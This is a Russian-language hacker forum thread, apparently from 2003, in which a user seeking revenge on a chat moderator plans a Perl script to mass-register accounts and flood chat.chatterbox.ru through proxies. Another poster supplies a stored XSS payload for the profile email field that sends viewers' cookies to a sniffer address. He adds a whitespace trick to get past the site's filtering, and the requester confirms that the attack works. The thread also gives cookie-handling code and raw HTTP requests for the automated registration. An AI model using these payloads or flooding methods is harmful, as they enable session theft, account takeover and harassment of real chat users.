Предистория: Грязный модер по прозвищу АкБарс появляющийся в чате орентировочно с 23 до 2 учинил со сной экзекуцию, которой я не заслуживал, на что я пожаловался админу чата ROSTу, не получив определенного ответа, а так же не услышав извинений в свой адрес задался целью насолить (как и многие из здесь собравшихся). На данном этапе пишу скрипт авторегистрации. Не важно помогут мне или нет я его НАПИШУ (тем более, что мне интересен этот процесс как программисту, возможно в дальнейшем я подарю его Августу, но снечала они утонут в море новых ников - флудеров). Смысл скрипта - зарегить море ников и с промежутками в 10 минут заходить под случайным ником и флудить. Затем меняем прокси запускаем нового случайного (важно чтобы они были зарегены в разные дни).....

За основу взял перл с библиотекой LWP - библиотека для доступа к WWW из Perl.
Может кто подскажет кто какими средствами пользуется
Инеткрак не сохраняет кукесы (а может я просто не знаю? или кукесы сохраняются обычнм путем?), а они используют отправку куке для открытия сесии ПХП регистрации. Может кто знает особенности их скрипта? Почему то не смог с помощью ИнетКрак зарегить ни одного пользователя постоянно выбрасывает на первую страницу. Причем похожая картина наблюдалась в ИЕ в тот момент, когда я отключил куки вообще.
Пробовал брать кук ПХП с ответа сервера - не помогет.

Вобщем жду любой помощи.
Флейм не приветствуется http://forum.antichat.ru/iB_html/non-cgi/emoticons/mad.gif

InetCrack поддерживает отправку кукисов.
А не получается зарегить еще одного пользователя вероятно из-за того, что ты используешь старый номер сессии, с которого уже была произведена регистрация. А для новой регистрации нужно сначала получить новый номер сессии.

(да и кстати этот чат ломается через мыло в инфе юзеров)

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ апреля 25 2003,23:39)</td></tr><tr><td id="QUOTE">InetCrack поддерживает отправку кукисов

(да и кстати этот чат ломается через мыло в инфе юзеров)[/QUOTE]<span id='postcolor'>
спасибо за оперативность ) очень рад, что здесь такие гостеприимные админы )

Можно про мыло в мыло mailsks@rambler.ru поподробнее.

Номер сесии я указвал новый после первого запроса
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">GET http://chat.chatterbox.ru/people/form HTTP/1.0
Accept: */*
Accept-Language: ru
Cookie: hotlog=1; b=b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: chat.chatterbox.ru
Proxy-Connection: Keep-Alive
[/QUOTE]<span id='postcolor'>
пришел куке
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">
Set-Cookie: PHPSESSID=839c0f351709dda12a49e10f15a8bff2; path=/
[/QUOTE]<span id='postcolor'>
Именно его я указал в последующем

Кстати. На поминание о забытом пароле по майл - отключено (видимо в настройках)

У меня кук по этому запросу (GET http://chat.chatterbox.ru/people/form HTTP/1.0) не устанавливается. Он устанавливается где-то ранее.
В любом случае, как говорил мой знакомый, идеализма не бывает http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif Если что-то не получается, значит неправильно делаешь.
Сравнивай запросы браузера и запросы инетКрека.Ищи различия.
Возможно чат требует что бы были пройдены все странички заполнения инфы, а не только последняя (которую ты и пытаешся запостить, я так понимаю)

Касаемо взлома через мыло - посмотри на мою инфу в чате (на ник Algol) и сам все увидишь &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

С мылом всё понятно, вопрос можно ли отправить на страниуку со снифером?

Без проблем ...
собственно даже отправлять никуда не нужно, просто
пишешь background:url(document.all[28].innreText)
А в соответствующем поле указываешь адрес картинки снифера.
Ну конечно можно еще поизвращаться что бы скрыть левые надписи в инфе, но это уже тонкости.

Прости за ламерство, но потратил пол дня на прочтение инфы. Видно подставлять в поле Mail нужно видоизмененную строчку
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">``style=`background:url(javascript: navigate(document.all[28].innerText));`[/QUOTE]<span id='postcolor'>
так как прямое копирование не помогло (

Получил таки куку с этой странички. помог метод ignore_discard: - сохранять даже файлы cookie, которые должны быть уничтожены (логический параметр)
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">use LWP::UserAgent;
use HTTP::Cookies;
$ua = LWP::UserAgent-&gt;new;
$ua-&gt;cookie_jar(HTTP::Cookies-&gt;new(file =&gt; &quot;lwpcookies.txt&quot;, autosave =&gt; 1, ignore_discard =&gt; 1));
$ua-&gt;agent(&quot;Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)&quot;);
$ua-&gt;proxy(['http', 'ftp'] =&gt; 'http://161.53.73.251:80/'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif;
$req = HTTP::Request-&gt;new('GET',&quot;http://chat.chatterbox.ru/people/form&quot;);
$res = $ua-&gt;request($req);
print $res-&gt;content if $res-&gt;is_success;[/QUOTE]<span id='postcolor'>

Получена сесия ИД:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">#LWP-Cookies-1.0
Set-Cookie3: PHPSESSID=3852bde9e0061a3f2e121da9fc44a9d0; path=&quot;/&quot;; domain=&quot;chat.chatterbox.ru&quot;; path_spec; discard; version=0[/QUOTE]<span id='postcolor'>

Эта зараза сразу отправляет второй запрос и тут же удаляет кук
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">GET http://chat.chatterbox.ru/people/css.php HTTP/1.0
Accept: */*
Referer: http://chat.chatterbox.ru/people/form
Accept-Language: ru
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: chat.chatterbox.ru
Cookie: PHPSESSID=3852bde9e0061a3f2e121da9fc44a9d0[/QUOTE]<span id='postcolor'>

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (1234567 @ апреля 26 2003,12:10)</td></tr><tr><td id="QUOTE">Прости за ламерство, но потратил пол дня на прочтение инфы. Видно подставлять в поле Mail нужно видоизмененную строчку
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">``style=`background:url(javascript: navigate(document.all[28].innerText));`[/QUOTE]<span id='postcolor'>
так как прямое копирование не помогло ([/QUOTE]<span id='postcolor'>
Прямое копирование не помогло, поскольку я забыл сказать об одной тонкости (вернее я думал ты сам ее заметишь):
Г-н автор чата видимо тоже не полный ламер, и наверно седьмым чувством почувстовал что в поле email-а содержится опсаность, и потому, если строчка длинная, вставляет туда один пробел, разбивая строку и нарушая таким образом синтаксис жабаскрипта. А может это просто глюк чата.
В любом случае нужно писать скрипт так, что бы этот пробел вставился в такое место, где он не нарушит синтаксис. Поэтому в моем примере между словом javascript: и словом naviagte должно быть ровно 6 пробелов. Тогда чат вставит еще свой 7-й пробел прямо перед словом navigate и синтаскис останется верным ))).

Насчет куков.
Я удалил куки с машины , и потом зашел по http://chat.chatterbox.ru/people/form . В результате чат прислал таки кук (что и логично, ведь на каком то этапе должен же он его прислать)
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
HTTP/1.0 200 OK
Date: Sat, 26 Apr 2003 16:34:44 GMT
Server: Apache/1.3.27 (Unix) PHP/4.2.3
Content-Location: form.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/4.2.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
RemovedHeader: Sat, 26 Apr 2003 16:34:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d85e733d92ad3060d49e0917ab463caa; path=/
RemovedHdr: close
Content-Type: text/html; charset=windows-1251
[/QUOTE]<span id='postcolor'>

Тут конечно какая-то тонкая игра с куками происходит, поскольку вот эти все параметры RemovedHeader: , RemovedHdr: close мне не нравятся, и вообще я не знаю для чего они собственно предназначены.

Но во всяком случае ясно что если запрос уже содержит кук, то он не присылается, а если кука нет, то генерится новый номер сессии и устанавливается новый кук.
поэтому в ответ на такой запрос
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
GET http://chat.chatterbox.ru/people/form HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: uk
Proxy-Connection: Keep-Alive
If-Modified-Since: Mon, 25 Apr 1983 20:37:04 GMT; length=6000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: chat.chatterbox.ru
[/QUOTE]<span id='postcolor'>
всегда будет приходить новый номер сессии.

Касаемо подгружаемого затем CSS.PHP то думаю этот запрос уже с куками ничего не делает. Это просто стили...

С никами я разобрался, кроме сего прочего не http стоит ограничение - 40 так что получилось без метки -http://www.hackzone.ru/cgi-bin/sniff.cgi, переход получился только со страницы Люди в чате, из самого чата по кнопке i &nbsp;переход не происходит.

css.php отключил - потерял стиль, но ник зарегился. Буду двигатся дальше. Спасибо за помощь &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (1234567 @ апреля 26 2003,23:47)</td></tr><tr><td id="QUOTE">переход получился только со страницы Люди в чате, из самого чата по кнопке i переход не происходит.[/QUOTE]<span id='postcolor'>
вот здесь ты ошибаешся.
Просто отбражение твоей собственной инфы происходит по другому чем у других чатлан. У других скрипт сработает.

да действительно, вышел паралельно под другим ником и сработало